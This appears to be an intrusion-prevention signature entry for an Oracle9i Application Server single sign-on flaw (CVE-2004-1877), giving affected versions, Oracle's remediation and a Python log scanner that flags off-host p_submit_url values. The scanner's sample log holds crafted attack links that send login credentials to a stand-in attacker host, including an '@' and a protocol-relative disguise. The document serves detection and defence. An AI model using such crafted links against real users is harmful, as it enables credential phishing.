Intrusion Prevention

Oracle.Single.Sign.On.Information.Disclosure

Description

This indicates a possible exploit of a credential disclosure vulnerability in the sample login form shipped with Oracle9i Application Server (9iAS). The form takes the URL to which the entered credentials are posted from the request parameter p_submit_url, so an attacker who gets a user to open a crafted link to the login page can have that user's username and password submitted to a server the attacker controls.

Affected Products

Oracle HTTP Server 9.2.0
Oracle HTTP Server 9.0.1
Oracle HTTP Server 8.1.7
Oracle9i Application Server 9.0.3.1
Oracle9i Application Server 9.0.3
Oracle9i Application Server 9.0.2.3
Oracle9i Application Server 9.0.2.2
Oracle9i Application Server 9.0.2.1
Oracle9i Application Server 9.0.2.0.1
Oracle9i Application Server 9.0.2.0.0
Oracle9i Application Server 9.0.2
Oracle9i Application Server 1.0.2.2.2
Oracle9i Application Server 1.0.2.2
Oracle9i Application Server 1.0.2.1s
Oracle9i Application Server 1.0.2

Impact

Information disclosure: a remote attacker can capture the username and password a user enters into the login form.

Recommended Actions

Oracle has released the following solution:
Hard-code the p_submit_url value in the customized login page instead of accepting it as an input parameter. Once the submission URL is fixed in the page, a crafted link can no longer redirect the posted credentials to another host.
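The check below is an added example, not the IPS signature itself or Oracle's code. It shows the detection logic a practitioner would run over web server access logs for this issue: requests to the login page whose p_submit_url points at a host other than the SSO server are the ones that would leak credentials. The SSO host name, the login page path, the sample log lines and the victim/attacker addresses are all constructed for the example; the real values depend on the deployment.

```python
"""Flag login-page requests whose p_submit_url would post credentials off-host
(the CVE-2004-1877 credential theft pattern). Added example, not vendor code."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed host name of the SSO server; replace with the deployment's own.
SSO_HOST = "sso.example.com"

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log; the login path /pls/orasso/login is an assumption.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2004:10:01:02 +0000] "GET /pls/orasso/login?p_submit_url=/pls/orasso/ls_login HTTP/1.1" 200 5120
198.51.100.7 - - [10/Mar/2004:10:01:09 +0000] "POST /pls/orasso/ls_login HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2004:10:04:33 +0000] "GET /pls/orasso/login?p_submit_url=http%3A%2F%2Fevil.example%2Fharvest HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2004:10:04:51 +0000] "GET /pls/orasso/login?p_submit_url=http%3A%2F%2Fsso.example.com%40evil.example%2F HTTP/1.1" 200 5120
203.0.113.42 - - [10/Mar/2004:10:07:15 +0000] "GET /pls/orasso/login?p_submit_url=%2F%2Fevil.example%2Fh HTTP/1.1" 200 5120
"""


def submit_url_host(request_target: str) -> Optional[str]:
    """Host that a p_submit_url value would send the login POST to.

    Returns None when the parameter is absent and '' when the value is a
    relative URL (which stays on the serving host).
    """
    parts = urlsplit(request_target)
    values = parse_qs(parts.query, keep_blank_values=True).get("p_submit_url")
    if not values:
        return None
    # parse_qs decoded once; decode again so a double-encoded URL is not missed.
    target = unquote(values[0]).strip()
    # Browsers treat backslashes after the scheme like slashes; normalise them
    # so "http:\\evil.example" is parsed the way a browser would follow it.
    target = target.replace("\\", "/")
    # urlsplit takes the host after the last '@', so
    # "http://sso.example.com@evil.example/" correctly resolves to evil.example.
    return urlsplit(target).hostname or ""


def classify_request(request_target: str, sso_host: str = SSO_HOST) -> str:
    """'absent', 'same-host' (relative or pointing at the SSO server), or 'off-host'."""
    host = submit_url_host(request_target)
    if host is None:
        return "absent"
    if host == "" or host == sso_host.lower():
        return "same-host"
    return "off-host"


def scan_log(text: str, sso_host: str = SSO_HOST) -> List[Tuple[str, str]]:
    """Return (client IP, attacker host) for every request that would leak credentials.

    The client IP is usually the victim who followed the crafted link; the
    attacker's collection server is the host named in p_submit_url.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if classify_request(m["target"], sso_host) == "off-host":
            hits.append((m["ip"], submit_url_host(m["target"]) or ""))
    return hits


if __name__ == "__main__":
    for ip, host in scan_log(SAMPLE_LOG):
        print(f"credential post redirected off-host: client={ip} target={host}")
```

Because the request that triggers this is normally made by the victim's browser, the flagged client address identifies who was phished, not the attacker; the attacker's host is the one carried in p_submit_url. Any p_submit_url value at all is unexpected once the page is hard-coded as Oracle recommends, so after remediation the check can be tightened to alert on the parameter's mere presence.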

CVE References

CVE-2004-1877